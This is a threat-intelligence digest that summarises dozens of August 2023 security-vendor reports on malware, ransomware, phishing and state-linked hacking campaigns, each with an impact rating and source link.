- CraxsRAT_and_CypherRAT_Created_by_EVLF_DEV
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- The CYFIRMA research team has identified a new Malware-as-a-Service (MaaS) operator known as EVLF DEV. This threat actor is responsible for the development of CypherRAT and CraxsRAT, which have been purchased on a lifetime licence by over 100 different threat actors in the previous three years.
Source:
https://www.cyfirma.com/outofband/unmasking-evlf-dev-the-creator-of-cypherrat-and-craxsrat/
—
- Intel Source:
- Sentinelone
- Intel Name:
- New_Variant_of_XLoader_macOS_Malware
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed that a new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called OfficeNote.
—
- Intel Source:
- ASEC
- Intel Name:
- APT_Attack_Patterns_Targeting_Web_Services_of_Korean_Corporations
- Date of Scan:
- 2023-08-22
- Impact:
- MEDIUM
- Summary:
- ASEC reserachers has discovered the APT attacks on Korean corporate web servers. The attackers exploit vulnerabilities to infiltrate and execute malicious actions. The report covers attack techniques such as privilege escalation, credential theft, and remote control using tools like Mimikatz, Potato, and NetCat. The attackers’ objectives appear to evolve from ad insertion to potentially deploying ransomware.
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese_APT_Targeting_Hong_Kong_in_Supply_Chain_Attack
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- Symantec researchers have identified that an emerging China-backed advanced persistent threat group targeted organizations in Hong Kong in a supply chain attack that leveraged legitimate software to deploy the PlugX/Korplug backdoor.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- System_BCMalware_Activity
- Date of Scan:
- 2023-08-21
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the captured request: /systembc/password.php. According to some references, this is likely the SystemBC Remote Access Trojan (RAT), all 4 IPs are part of the Digital Ocean ASN and only one has been reported as likely malicious.
Source:
https://isc.sans.edu/diary/SystemBC+Malware+Activity/30138/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_WoofLocker_Tech_Support_Campaign_is_Back
- Date of Scan:
- 2023-08-21
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have discovered that the WoofLocker tech support scam scheme has returned. The tactics and procedures are fairly similar, but the infrastructure has been strengthened to withstand future takedown attempts.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/08/wooflocker2
—
- Intel Source:
- Lumen
- Intel Name:
- HiatusRAT_Returns_To_Action_After_A_Short_Break
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- Lumen researchers have continued to track threat actor resulting in new malware samples and infrastructure associated with the HiatusRAT cluster. In the latest campaign, they observed a shift in reconnaissance and targeting activity.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- From_a_Zalando_Phishing_to_a_RAT
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have seen a bunch of phishing emails targeting Zalando customers.
Source:
https://isc.sans.edu/diary/From+a+Zalando+Phishing+to+a+RAT/30136/
—
- Intel Source:
- QuickHeal
- Intel Name:
- Diving_Deep_into_Darkrace_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- The incorporation of Lockbit’s strategies into DarkRace demonstrates how cybercriminals are utilizing tried-and-true techniques to strengthen their attacks and increase damage. Combining these strategies could increase infections, compromise data, and escalate ransom demands.
Source:
https://blogs.quickheal.com/darkrace-ransomware-a-deep-dive-into-its-techniques-and-impact/
—
- Intel Source:
- eSentire
- Intel Name:
- StealC_Delivering_via_Deceptive_Google_Sheets
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- Researchers at Esentire have discovered that a malicious advertisement that the user saw while trying to download Google Sheets was the infection’s point of origin. This advertisement sent the visitor to a malicious website that contained a downloader for the malware StealC infostealer.
Source:
https://www.esentire.com/blog/stealc-delivered-via-deceptive-google-sheets
—
- Intel Source:
- Blackberry
- Intel Name:
- New_Tool_Deployed_by_Cuba_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- BlackBerry researchers have discovered and documented new tools used by the Cuba ransomware threat group. It is currently in the fourth year of its operation and shows no sign of slowing down. In the first half of 2023 alone, the operators behind Cuba ransomware were the perpetrators of several high-profile attacks across disparate industries.
—
- Intel Source:
- QuickHeal
- Intel Name:
- Mallox_Ransomware_Targeting_Unprotected_Microsoft_SQL_Servers
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- Researchers from QuickHeal have discovered that the Mallox (also known as TargetCompany) ransomware is presently using unprotected Microsoft SQL Servers as an attack vector to enter victims’ systems and spread itself.
Source:
https://blogs.quickheal.com/mallox-ransomware-strikes-unsecured-mssql-servers/
—
- Intel Source:
- Fortinet
- Intel Name:
- NoCry_and_Trash_Panda_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- Researchers from Fortinet looked into Trash Panda and a fresh, tiny NoCry ransomware strain. Windows-based malware called Trash Panda was initially discovered in the first few days of August. On infected computers, it encrypts files, changes the desktop background, and drops a ransom note with political statements. The Windows platform ransomware known as NoCry was first identified in April 2021. The creators of the NoCry ransomware produce variations that are then offered for sale on the group’s Telegram channel.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-trash-panda-and-nocry-variant
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Gozi_Malware_Launches_Another_Attack
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- Researchers at IBM Security Intelligence have noticed that the Gozi malware has returned and is now focusing on cryptocurrency platforms, banks, and other financial institutions.
Source:
https://securityintelligence.com/posts/gozi-strikes-again-targeting-banks-cryptocurrency-and-more/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- A_new_phishing_campaign_targeting_Zimbra_users
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- ESET researchers have uncovered a mass-spreading phishing campaign, aimed at collecting Zimbra account users’ credentials, active since at least April 2023 and still ongoing. Zimbra Collaboration is an open-core collaborative software platform, a popular alternative to enterprise email solutions. The campaign is mass-spreading; its targets are a variety of small and medium businesses and governmental entities. According to ESET telemetry, the greatest number of targets are located in Poland, followed by Ecuador and Italy. To date, we have not attributed this campaign to any known threat actors.
Source:
https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/
—
- Intel Source:
- Sysdig
- Intel Name:
- Malicious_Campaign_Targeting_GitLab
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- The Sysdig Threat Research Team have discovered a new, financially motivated operation, dubbed LABRAT. This operation set itself apart from others due to the attacker’s emphasis on stealth and defense evasion in their attacks.
Source:
https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
—
- Intel Source:
- Security Affairs
- Intel Name:
- Massive_phishing_campaign_targets_energy_sector
- Date of Scan:
- 2023-08-17
- Impact:
- MEDIUM
- Summary:
- Starting this May 2023, researchers from Cofense have observed a massive phishing campaign using QR codes in attacks to steal the Microsoft credentials of users from multiple industries. One of the organizations targeted by hackers is a notable energy company in the US.
Source:
https://securityaffairs.com/149567/hacking/phishing-campaign-qr-codes.html?amp=1
—
- Intel Source:
- AT&T
- Intel Name:
- The_Shadow_Nexus_of_Malware_and_Proxy_Application
- Date of Scan:
- 2023-08-16
- Impact:
- MEDIUM
- Summary:
- Researchers from AT&T Alien Labs found a significant campaign of attacks distributing a proxy server application on Windows computers. Additionally, a proxy service provider was found, whose proxy requests are forwarded through hacked systems that have been turned into residential exit nodes by malware invasion.
—
- Intel Source:
- Trustwave
- Intel Name:
- The_rise_of_LLM_engines_WormGPT_and_FraudGPT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Trustwave researchers discussed in their blog two such LLM engines that were up for sale available on underground forums, WormGPT and FraudGPT. If criminals would get their own ChatGPT-like tool, the implications for cybersecurity, social engineering, and overall digital safety could be so damagimg. This prospect highlights the importance of staying vigilant in our efforts to secure, and responsibly develop, artificial intelligence technology in order to mitigate potential risks and safeguard against misuse.
Source:
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/wormgpt-and-fraudgpt-the-rise-of-malicious-llms/
https://netenrich.com/blog/fraudgpt-the-villain-avatar-of-chatgpt
—
- Intel Source:
- Cyberint
- Intel Name:
- Raccoon_Stealer_Malware_Returns
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Cyberint researchers have seen that the developers of Raccoon Stealer information-stealing malware have ended their 6-month hiatus from hacker forums to promote a new 2.3.0 version of the malware to cyber criminals. It is one of the most well-known and widely used information-stealing malware families, having been around since 2019, sold via a subscription model for $200/month to threat actors.
Source:
https://cyberint.com/blog/financial-services/raccoon-stealer/
—
- Intel Source:
- Netscope
- Intel Name:
- Phishing_Campaign_Steals_Cloud_Credentials
- Date of Scan:
- 2023-08-16
- Impact:
- MEDIUM
- Summary:
- Last couple months Netskope Threat Labs analysts has been monitoring a staggering 61-fold increase in traffic to phishing pages hosted in Cloudflare R2. The most of the phishing campaigns target Microsoft login credentials, although there are some pages targeting Adobe, Dropbox, and other cloud apps. The attacks have been targeting victims mainly in North America and Asia, across different segments, led by the technology, financial services, and banking sectors.
—
- Intel Source:
- Cyble
- Intel Name:
- Amadey_Bot_leveraged_by_LummaC_Stealer_to_Deploy_SectopRAT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Cyble reserachers has recently come across a novel approach for spreading SectopRAT. This technique entails delivering the SectopRAT payload by utilizing the Amadey bot malware, which is retrieved from the LummaC stealer.
Source:
https://cyble.com/blog/lummac-stealer-leveraging-amadey-bot-to-deploy-sectoprat/
—
- Intel Source:
- Uptycs
- Intel Name:
- QwixxRAT_aka_Telegram_RAT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- The Uptycs researchers discovered QwixxRAT (aka Telegram RAT) in early August 2023. The threat actor is widely distributing their malicious tool through Telegram and Discord platforms. Once installed on the victim’s Windows platform machines, the RAT stealthily collects sensitive data, which is then sent to the attacker’s Telegram bot, providing them with unauthorized access to the victim’s sensitive information.
Source:
https://www.uptycs.com/blog/remote-access-trojan-qwixx-telegram
—
- Intel Source:
- ASEC
- Intel Name:
- Hakuna_Matata_ransomware
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Recently, ASEC reserachers has discovered the Hakuna Matata ransomware is used to attack Korean companies. Hakuna Matata is a recent ransomware and it was first time identified in July, 2023 on Twitter. Later this month, a post of a threat actor using Hakuna Matata on the dark web was shared on Twitter as well. Also to be mentined by researchers that the ransomware strains uploaded on VirusTotal, the file uploaded on July 2nd, 2023 is confirmed to be the first case.
—
- Intel Source:
- Trellix
- Intel Name:
- NetSupportRAT_exploring_new_techniques
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Trellix researchers observed a new campaign using fake Chrome browser updates to trick victims to install a remote administration software tool called NetSupport Manager. The threat actors take advantage of this software to steal information and take control of victim computers. The detected campaign has similarity with previously reported SocGholish campaign, which was run by a suspected Russian threat actor.
—
- Intel Source:
- Fortinet
- Intel Name:
- Continues_OSS_Supply_Chain_Attacks_Hidden_in_the_Python_Package
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Python Package Index (PyPI) packages have become a common thing for threat actors to post malware that unsuspecting victims possible download. The FortiGuard Labs analysts has been monitoring that activity attack vector for some time and posted the update of the zero-day attacks they have discovered. Recently, they discovered several new zero-day PyPI attacks using this AI engine assistant.
Source:
https://www.fortinet.com/blog/threat-research/continued-oss-supply-chain-attacks-hidden-in-pypi
—
- Intel Source:
- HP ThreatResearch
- Intel Name:
- The_malware_campaigns_use_a_variety_of_programming_languages
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Last couple months, HP ThreatResrearch team have noticed a surge of finance-themed malicious spam campaigns spreading malware through batch scripts (.bat). The campaigns use a wide variety of programming languages to achieve different objectives within the infection chain – from batch scripts, PowerShell, Go, shellcode to .NET.
Source:
https://threatresearch.ext.hp.com/do-you-speak-multiple-languages-malware-does/
—
- Intel Source:
- Cyfirma
- Intel Name:
- Stealthy_Malicious_MSI_Loader
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- The Cyfirma reserachers has observed a disguised Stealthy MSI Loader being advertised in dark web forums by Russian threat actor, showcasing it has a potential ability to evade detection by both Virus Total scan and Windows Defender. Additionally, through the researchers’s investigation, it was established a link between this MSI Loader and the BatLoader campaign observed in March 2023, highlighting potential coordination between these threats.
—
- Intel Source:
- Akamai
- Intel Name:
- New_Magento_Campaign_Discovered_called_Xurum
- Date of Scan:
- 2023-08-14
- Impact:
- LOW
- Summary:
- Over the past few months, Akamai has been closely monitoring a focused campaign that specifically targets a relatively small number of Magento deployments. They dubbed the campaign Xurum to reference the domain name of the C2 server utilized by the attacker.
Source:
https://www.akamai.com/blog/security-research/new-sophisticated-magento-campaign-xurum-webshell#:~:text=Akamai%20researchers%20have%20discovered%20an%20ongoing%20server-side%20template
of%20the%20attacker%E2%80%99s%20command%20and%20control%20%28C2%29%20server.
—
- Intel Source:
- CISA
- Intel Name:
- Updates_on_SEASPY_and_WHIRLPOOL_Backdoors
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- The US Department of Homeland Security (CISA) has published a report on Barracuda email servers that were compromised by cyber-thieves in the summer of 2016 and the following year. CISA obtained four malware samples – including SEASPY and WHIRLPOOL backdoors. The device was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-221a
—
- Intel Source:
- CERT UA
- Intel Name:
- Phishing_Attack_Targeting_Government_Agencies
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA has identified a phishing attack on government agencies involving fraudulent emails from CERT-UA urging password change through a malicious link. The attackers imitate Roundcube’s interface and use a deceptive subdomain
—
- Intel Source:
- Zscaler
- Intel Name:
- Unraveling_a_New_Threat_Targeting_LATAM_FinTech_Users
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- JanelaRAT, a newly discovered cyber threat, has been unveiled by Zscaler ThreatLabz. Primarily focused on the Latin American (LATAM) financial sector, this sophisticated malware employs advanced techniques including DLL side-loading and dynamic command and control infrastructure. With capabilities ranging from evasive maneuvers to self-defense mechanisms, the threat aims to compromise sensitive financial data. The malware’s origins are suggested by Portuguese strings in its code and a Portuguese-speaking developer, highlighting its targeted region and intentions.
—
- Intel Source:
- Trendmicro
- Intel Name:
- Monti_Ransomware_Group_Resumes_Attacks_with_New_Linux_Variant
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers observe the Monti ransomware group, resembling Conti, resumes attacks on legal and government sectors with a fresh Linux variant. Unlike previous versions, this variant modifies encryption methods, uses an infection marker, and alters system files.
—
- Intel Source:
- SOCRadar
- Intel Name:
- A_new_cybercriminals_service_called_Dark_Utilities
- Date of Scan:
- 2023-08-12
- Impact:
- MEDIUM
- Summary:
- In their blog, Cisco Talos shared that they observed malware samples using Dark Utilities service in the wild to establish C2 communications channels and remote access capabilities on infected systems. They discovered malware targeted Windows and Linux systems leveraging Dark Utilities
Source:
https://socradar.io/dark-utilities-platform-provides-c2-server-for-threat-actors/
—
- Intel Source:
- Sucuri
- Intel Name:
- The_surge_in_malware_cases_linked_to_a_Gootloader_payload_delivery
- Date of Scan:
- 2023-08-12
- Impact:
- LOW
- Summary:
- This month, Sucuri analysts traced a noticeable surge in malwares linked to a malicious payload delivery system known as Gootloader. The group behind this malware is believed to operate a malware-as-a-service operation, exclusively providing a malware delivery service for other threat actors. In their blog, Sucuri is dicussing why Gootloader is so effective, and go into the details of inner workings and shed light on the tactics employed by the operators behind it.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_SugarCRM_CVE_2023_22952_zero_day_vulnerability
- Date of Scan:
- 2023-08-12
- Impact:
- MEDIUM
- Summary:
- A zero-day vulnerability in the SugarCRM customer relationship management platform was used by threat actors to gain access to customers’ AWS accounts, according to a report from Palo Alto Networks Unit 42.
Source:
https://unit42.paloaltonetworks.com/sugarcrm-cloud-incident-black-hat/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Campaign_Against_NATO_Aligned_Foreign_Ministries
- Date of Scan:
- 2023-08-11
- Impact:
- MEDIUM
- Summary:
- Two PDF documents have been spotted, and EclecticIQ researchers believe with high confidence that they are a part of a continuous campaign aimed at NATO member countries’ foreign ministries. The PDF files contained two fake diplomatic invitations that appeared to be coming from the German embassy.
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- MoustachedBouncer_cyberespionage_activity_against_diplomats
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- MoustachedBouncer is a cyberespionage group discovered by ESET Research since 2014. Thousands of IPs have been seen by AT&T Alien Labs to act as proxy exit nodes in a way that resembles corrupted AdLoad systems. This activity might be a sign that tens of thousands of Mac computers have been taken over and used as proxy exit nodes. Over the past year, at least 150 samples have been seen in the wild. Welinesecurity reserachers believe that MoustachedBouncer uses a lawful interception system (such as SORM) to conduct its AitM operations.
—
- Intel Source:
- Kaspersky
- Intel Name:
- Common_TTPs_of_attacks_against_industrial_organizations
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Kaspersky ICS Cert analysts identified over 15 implants and their variants planted by the threat actor(s) in various combinations. The attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems. Analysts have medium to high confidence that a threat actor called APT31, also known as Judgment Panda and Zirconium, is behind the activities described in their report.
—
- Intel Source:
- Cyble
- Intel Name:
- The_Most_Recent_STRRAT_Version_Contains_Dual_Obfuscation_Layers
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- The Cyble Research and Intelligence Labs have discovered a fresh method of infection that is used to spread STRRAT. This novel approach entails disseminating STRRAT version 1.6, which makes use of two string obfuscation strategies.
Source:
https://cyble.com/blog/strrats-latest-version-incorporates-dual-obfuscation-layers/
—
- Intel Source:
- Fortinet
- Intel Name:
- Attackers_Using_Freezers_And_SYK_Crypter_to_Distribute_Malware
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard have discovered a brand-new Rust-written injector that can introduce XWorm and shellcode into a victim’s environment. Additionally, an investigation by researchers showed a sharp rise in injector activity in May 2023. To avoid antivirus detection, shellcode can be encrypted using AES, RC4, or LZMA, and it can be Base64-encoded.
Source:
https://www.fortinet.com/blog/threat-research/malware-distributed-via-freezers-and-syk-crypter
—
- Intel Source:
- Sucuri
- Intel Name:
- Hybrid_malware_leveraging_various_internet_protocols
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Sucuri analysts discover periodically an unique hybrid malware leveraging various internet protocols. During a recent investigation, the analysts found an interesting piece of JavaScript malware that indirectly uses the DNS protocol to obtain redirect URLs.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Zero_Day_Exploit_Case_Study_CVE_2023_36874
- Date of Scan:
- 2023-08-11
- Impact:
- MEDIUM
- Summary:
- In July 2023, the CrowdStrike Falcon team observed an unknown exploit with unknown vulnerability affecting the Windows Error Reporting (WER) component. Crowdstrike team put their findings to their report about this new vulnerability to Microsoft. Microsoft assigned the identifier CVE-2023-36874 to the vulnerability.
Source:
https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/
—
- Intel Source:
- Sentinelone
- Intel Name:
- In_Depth_Analysis_of_LOLKEK_Payloads
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Researchers from SentinelLabs have examined LOLKEK Payload sample sets. Small to medium-sized enterprises (SMBs) and individual users are typically the main objectives.
—
- Intel Source:
- Securelist
- Intel Name:
- Unknown_Actor_Using_DroxiDat_and_Cobalt_Strike
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Securelist researchers have seen a new SystemBC variant deployed to a critical infrastructure target. This time, the proxy-capable backdoor was deployed alongside Cobalt Strike beacons in a South African nation’s critical infrastructure.
Source:
https://securelist.com/focus-on-droxidat-systembc/110302/
—
- Intel Source:
- ASEC
- Intel Name:
- Changes_in_CHM_Malware_Distribution
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- ASEC has previously published a CHM malware type coping Korean financial institutes and insurance companies. Recently, the execution method of this malware type has been changing every week. ASEC post will cover how the changed execution processes of the CHM malware are recorded in AhnLab’s EDR products.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Attackers_Using_EvilProxy_Phishing_Kit
- Date of Scan:
- 2023-08-10
- Impact:
- HIGH
- Summary:
- Threat actors have been using the phishing toolkit EvilProxy to take control of cloud-based Microsoft 365 accounts belonging to executives at prominent companies.Researchers said the attacks exhibited both the prevalence of pre-packaged phishing-as-a-service toolkits, as well as the increased bypassing of multi-factor authentication to gain access to accounts.
—
- Intel Source:
- AT&T
- Intel Name:
- AdLoad_Turns_Mac_Systems_into_Proxy_Exit_Nodes
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- Thousands of IPs have been seen by AT&T Alien Labs to act as proxy exit nodes in a way that resembles corrupted AdLoad systems. This activity might be a sign that tens of thousands of Mac computers have been taken over and used as proxy exit nodes. Over the past year, at least 150 samples have been seen in the wild.
Source:
https://cybersecurity.att.com/blogs/labs-research/mac-systems-turned-into-proxy-exit-nodes-by-adload
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_Injection
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- High numbers of the Magniber ransomware are routinely disseminated. It has been disseminated through the Internet Explorer vulnerability for the past few years, however when the browser’s support ended, the vulnerability is no longer being exploited. Recently, the ransomware has started spreading through Chrome and Edge browsers using filenames impersonating Windows security update packages (such as ERROR.Center.Security.msi). Currently, Magniber injects the ransomware into an active process, causing damage by encrypting the user’s files.
—
- Intel Source:
- ASEC
- Intel Name:
- Tax_Invoices_and_Shipping_Statements_Posing_as_GuLoader_Malware
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered instances in which GuLoader was sent as an attachment in emails that were falsely labeled as shipping bills and tax invoices. A RAR (Roshal Archive packed) packed file included the freshly discovered GuLoader variation. GuLoader eventually downloads well-known malware strains including Remcos, AgentTesla, and Vidar when it is run by a user.
—
- Intel Source:
- Cyble
- Intel Name:
- Uncovering_Tech_Scammers_involved_in_different_ransomware_attacks
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Cyble researchers recently observed a new Tech Scam campaign. It seemed it has involved scammers setting up a non-existent antivirus solution site to deceive users into paying for non-existent services. During analysis, researchers discovered various ransomware variants leveraged by tech scammers to propagate their fraudulent schemes.
Source:
https://cyble.com/blog/utilization-of-leaked-ransomware-builders-in-tech-related-scams/
—
- Intel Source:
- ASEC
- Intel Name:
- The_malware_installation_as_normal_file_of_a_Korean_Development_Company
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- AhnLab has previously mentioned about the malware that is generated by the installation file of a Korean program development company. When malware is distributed alongside an installation file, users will struggle to notice that malware is being executed concurrently.
—
- Intel Source:
- ASEC
- Intel Name:
- The_Malware_distribution_as_Coin_exchange
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- ASEC lab response Center has recently discovered a new malware disguised with coin exchange and investment-related topics. The malware is pretended in the form of an executable and a Word file.It is suspected that it was created by the Kimsuky group.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Malicious_Python_Package_Campaign_Targets_Developers_through_PyPI
- Date of Scan:
- 2023-08-09
- Impact:
- MEDIUM
- Summary:
- Researchers from ReversingLabs identified persistent campaign leverages malicious Python packages on PyPI to deceive developers. Attackers mimic popular open-source tools, embedding hidden malicious code. They create matching GitHub repositories for credibility and employ dynamic command and control URLs
—
- Intel Source:
- Aquasec
- Intel Name:
- Kubernetes_Exposed
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- The potential catastrophe of having Kubernetes (k8s) cluster hijacked is could be a disaster magnified a million times over. Aquasec researchers investigated and uncovered Kubernetes clusters belonging to more than 350 organizations, open-source projects, and individuals, openly accessible and largely unprotected. At least 60% of them were breached and had an active campaign that deployed malware and backdoors.
Source:
https://blog.aquasec.com/kubernetes-exposed-one-yaml-away-from-disaster
—
- Intel Source:
- Zscalar
- Intel Name:
- New_InfoStealer_Named_Statc_Stealer
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz researchers have discovered a new information stealer family called Statc Stealer. It is a sophisticated malware that infects devices powered by Windows, gains access to computer systems, and steals sensitive information.
Source:
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
—
- Intel Source:
- Cyble
- Intel Name:
- The_AgentTesla_malware_attack
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) has recently observed an AgentTesla malware attack that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into opening Tax related documents and accompanying control panel files (CPL).
Source:
https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/
—
- Intel Source:
- SOC Radar
- Intel Name:
- Investigating_the_Big_Head_Ransomware
- Date of Scan:
- 2023-08-08
- Impact:
- LOW
- Summary:
- After first appearing in May 2023, Big Head Ransomware is a relatively new actor in the cyber threat environment. This malicious program is made up of several different varieties, each with its own features and powers. Little is known about the threat actor who is responsible for the Big Head Ransomware. The actor has been seen interacting with victims on Telegram and through emails.
Source:
https://socradar.io/dark-web-profile-big-head-ransomware/
—
- Intel Source:
- Team-Cymru
- Intel Name:
- An_Overview_of_Qakbot_Infrastructure
- Date of Scan:
- 2023-08-08
- Impact:
- LOW
- Summary:
- Team-Cymru researchers have provided an update on the high-level analysis of QakBot infrastructure, this represents an ongoing piece of research, their analysis of QakBot is fluid with various hypotheses being identified and tested. As and when they uncover new insights into QakBot campaigns they will seek to provide further written updates.
Source:
https://www.team-cymru.com/post/visualizing-qakbot-infrastructure-part-ii-uncharted-territory
—
- Intel Source:
- Sentilone
- Intel Name:
- North_Korea_icompromised_Russian_Missile_Engineering_Company
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- SentinelLabs identified an intrusion into the Russian defense industrial base, specifically a missile engineering organization NPO Mashinostroyeniya. Our analysis attributes the email server compromise to the ScarCruft threat actor. We also identify the separate use of a Lazarus Group backdoor for compromise of their internal network.
—
- Intel Source:
- TrendMicro
- Intel Name:
- TargetCompany_Ransomware_Abusing_FUD_Obfuscator_Packers
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- In order to persistently deploy its initial stage, the most recent version of the TargetCompany ransomware first exploits weak SQL servers. The code tries many approaches to try persistence, such as switching the URLs or relevant routes, until it successfully locates a location to run the Remcos RAT.
—
- Intel Source:
- Talos
- Intel Name:
- New_Threat_Actor_Leveraging_Customized_Yashma_Ransomware
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Researchers from Cisco Talos have identified an unknown threat actor, who appears to be of Vietnamese descent, who has been operating ransomware since at least June 4, 2023. This continuing attack makes use of a Yashma ransomware version that mimics WannaCry traits and is expected to target several locations. The ransom note is sent using an unusual method by the threat actor. They execute an embedded batch file to download the ransom note from the actor-controlled GitHub repository rather than inserting the ransom note strings in the malware.
Source:
https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Water_minyades_batloader_malware
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers observe the Water Minyades Batloader malware has evolved with Pyarmor Pro obfuscation, making manual de-obfuscation difficult. Using large MSI files, it initiates a sophisticated kill chain, fingerprinting victim networks and delivering second-stage payloads for stealthy attacks.
Source:
https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html
—
- Intel Source:
- Fortinet
- Intel Name:
- DoDo_and_Proton_Ransomware_targeting_windows_users
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have discovered the Ransomware Roundup report highlights the emerging threats of DoDo and Proton ransomware variants, both specifically designed to target Microsoft Windows users. DoDo ransomware, a derivative of Chaos ransomware, disguises itself as an educational application called “Mercurial Grabber” to steal information and encrypt victims’ files. Its recent variants demand ransom for file decryption and data non-disclosure. Meanwhile, Proton ransomware encrypts files on Windows systems, demanding a ransom for file recovery.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-dodo-and-proton
—
- Intel Source:
- CERT UA
- Intel Name:
- MerlinAgent_cyber_attacks_against_Ukraine
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Ukraine’s CERT-UA is warning of malicious emails posing as official communications. The emails contain harmful attachments, leading to the execution of dangerous scripts and the deployment of the malicious “ctlhost.exe” associated with the MerlinAgent program
—
- Intel Source:
- Security Affairs
- Intel Name:
- NPM_highly_targeted_attacks
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Security Affairs researchers discovered a new set of malicious packages on the npm package manager that can exfiltrate sensitive developer data.
Source:
https://securityaffairs.com/149165/hacking/npm-highly-targeted-attacks.html
—
- Intel Source:
- PT Security
- Intel Name:
- The_Cyber_Campaign_by_Space_Pirates_in_Russia_and_Serbia
- Date of Scan:
- 2023-08-05
- Impact:
- MEDIUM
- Summary:
- Using unique strategies and acquiring new cyber weapons, the threat actor known as Space Pirates has been connected to attacks on at least 16 organizations in Serbia and Russia over the past year. Governmental organizations, educational institutions, private security firms, aerospace makers, agricultural producers, defense, energy, and healthcare companies are among the targets.
—
